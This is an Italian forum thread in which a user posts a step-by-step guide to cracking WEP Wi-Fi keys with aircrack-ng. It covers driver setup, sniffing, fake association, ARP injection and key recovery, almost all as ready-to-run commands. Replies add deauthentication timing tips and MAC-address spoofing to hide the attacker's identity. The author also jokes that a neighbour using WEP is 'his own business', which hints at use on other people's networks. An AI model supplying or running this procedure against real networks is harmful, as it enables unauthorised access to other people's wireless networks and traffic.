WEP crack con aircrack, sniff-deauth-fakeass-inject-cracking

narcycs

Utente Silver
20 Maggio 2009
0
0
0
55
Salve, mi presento (dato che è il mio primo post e la mia prima guida).
Sono un ragazzo siciliano di 20 anni, che studia ingegneria informatica, con la passione per la programmazione e per i calcolatori. Amante della vita comoda e quindi di tutto ciò che è in grado di semplificare la vita ;)

ho scritto questa guida (molto semplice, per un utente medio), qualche mese fa, e vorrei condividere qualcosa che non riuscivo a trovare quando interessava a me... spero sia di vostra utilità.

#PREPARARE IL TUTTO PER BENE
#[06-11-2008 23:03]


0) pre-pre-requisiti

conoscenza sistema linux
utilizzo bash
compilazione programmi
capacità di scrivere su una tastiera
utilizzo del mouse/touchpad

- Software utilizzato
Ubuntu 8.04 con kernel 2.6.24-21
aicrack-ng 1.0
driver ipwraw

- Hardware
Portatile acer 5920g con scheda intel 3945abg
un cervello
lattina di pepsi al limone



1) pre-requisiti

installare dai repositories i seguenti pacchetti:
build-essential
libssl-dev

Codice:
sudo apt-get install build-essential libssl-dev

scaricare i driver ipwraw da http://dl.aircrack-ng.org/drivers/
percorso completo http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2

estrarre i file

Codice:
tar -xvjf ipwraw-ng-2.3.4-04022008.tar.bz2

entrare nella cartella e digitare dalla shell

Codice:
sudo make
sudo make install
sudo make install_ucode

aggiungere il modulo ipwraw alla blacklist di avvio (per evitare che vengano caricati all'avvio al posto del modulo iwl3945).

Codice:
sudo echo 'blacklist ipwraw' >> /etc/modprobe.d/blacklist



2) installare aircrack
- dai repositories
- scaricando i sorgenti, compilandoli ed installandoli


# EOF


[...fine primo tempo...]
[...secondo tempo...]


#CRACKING WEP KEY
#[06-11-2008 23:15]

0) caricamento moduli
{----attenzione----}
prima di usare aircrack
-disabilita driver iwl3945
Codice:
sudo modprobe -r iwl3945

-carica ipwraw
Codice:
sudo modprobe ipwraw

-potenziamento del segnale
Codice:
sudo iwconfig wifi0 rate 1M

--------------------
per connettersi normalmente
-disabilita driver ipwraw
Codice:
sudo modprobe -r ipwraw

-carica iwl3945
Codice:
sudo modprobe iwl3945
{-------fine-------}

1) vediamo che c'è in giro

Codice:
sudo airodump-ng wifi0

appuntarsi su un file di testo:
A) nome rete
B) mac access point
C) mac client connesso
D) canale

[img=390x233]http://img522.imageshack.us/img522/8875/schermatave5.png[/img]


2) inizia lo sniffing

Codice:
airodump-ng -c "canale" -b "mac access point" -w file.cap wifi0



3) fake association

Codice:
aireplay-ng -1 0 -e "nome rete" -a "mac access point" -h "mac della nostra scheda" wifi0

ovviamente senza le virgolette.
per sapere il nostro mac basta fare:
Codice:
ifconfig | grep HWaddr

se tutto va bene vi dovrà spuntare una bella faccina del genere ;)



4) injection

Codice:
aireplay-ng -3 -b "mac access point" -h "mac client connesso" wifi0



5) cracking

aspettare circa 30 minuti, a volte anche meno, per poter raccogliere almeno 100000 IVS
dopo di che lanciare:

Codice:
$ sudo aircrack-ng file.cap

aspettare un po' ed ECCOCI LA CHIAVE WEP



# EOF


[by narcycs, informazioni prese su internet da molti siti web, non mi assumo alcuna responsabilità per l'utilizzo di questo post]


alla prossima, saluti
 
ciao narcycs! mi piace il tuo post =) soprattutto questo:
Portatile acer 5920g con scheda intel 3945abg
un cervello
lattina di pepsi al limone
finalmente qualcuno che si ricorda di scriverlo tra i requisiti!!!
[ot]io preferisco la birra... ma ho visto che l'attacco funziona ugualmente asdasd [/ot]
 
davvero ottimo,sticko questa discussione.Comunque per rendere più comprensibile il tutto puoi usare i tag
Codice:
[/*code] (senza *) e ridimensionare l'immagine con [img=AxL][*/img] (senza * e dove A è l'altezza in pixel e L la larghezza).;)
 
Ottima guida.
Nel comando aircrack-ng gli darei anche un bel -b e il bssid in questione...
...un altro consiglio che posso dare, è di fare una fake, poi una injection, una deauth e in seguito un'altra fake. (o senza deauth direttamente un'altra fake, ma si rischia di non essere accettati)....
In questo modo non staremo ad aspettare troppo un pacchetto ARP ma cominceremo subito la injection.
se invece è gia presente un client, naturalmente, niente fake...aprire due terminali e scrivere in una la injection, nell'altra la deauth....avviarle praticamente in contemporanea ma nell'ordine in cui l'ho messe....quindi prima injection e dopo deauth....e snifferemo subito l'ARP.
Per quanto riguarda il tempo ormai, ci si mette molto meno di 30 minuti.....25000 ivs bastano nella maggior parte dei casi.

Ultimo consiglio, ovviamente la tua guida è per puro scopo informativo, ma ci infilerei dentro anche il comando per spoofare il mac:
sudo ifconfig wifi0 down
sudo ifconfig wifi0 hw ether 00:00:00:00:00:00
sudo ifconfig wifi0 up

...o in alternativa macchanger.
sudo apt-get install macchanger
 
R4z0r_Cr4$H ha detto:
davvero ottimo,sticko questa discussione.Comunque per rendere più comprensibile il tutto puoi usare i tag
Codice:
[/*code] (senza *) e ridimensionare l'immagine con [img=AxL][*/img] (senza * e dove A è l'altezza in pixel e L la larghezza).;)
[/quote]

fatto :)   -   grazie 1000 R4z0r_Cr4$H

[quote=Bukowsk!]
Ultimo consiglio, ovviamente la tua guida è per puro scopo informativo[/quote]

semplicemente per rendersi conto di quanto sia poco sicuro utilizzare una WEP per la connessione al proprio access point..... se poi il vicino di casa usa WEP...affari suoi :D

[quote=Bukowsk!]
ma ci infilerei dentro anche il comando per spoofare il mac:
sudo ifconfig wifi0 down
sudo ifconfig wifi0 hw ether 00:00:00:00:00:00
sudo ifconfig wifi0 up
[/quote]

:) beh se siamo sul nostro router, poco ci importa spoofare il mac xD
ottimo consiglio però!

mi fa piacere che sia stata di vostro gradimento, grazie dell'attenzione, alla prossima!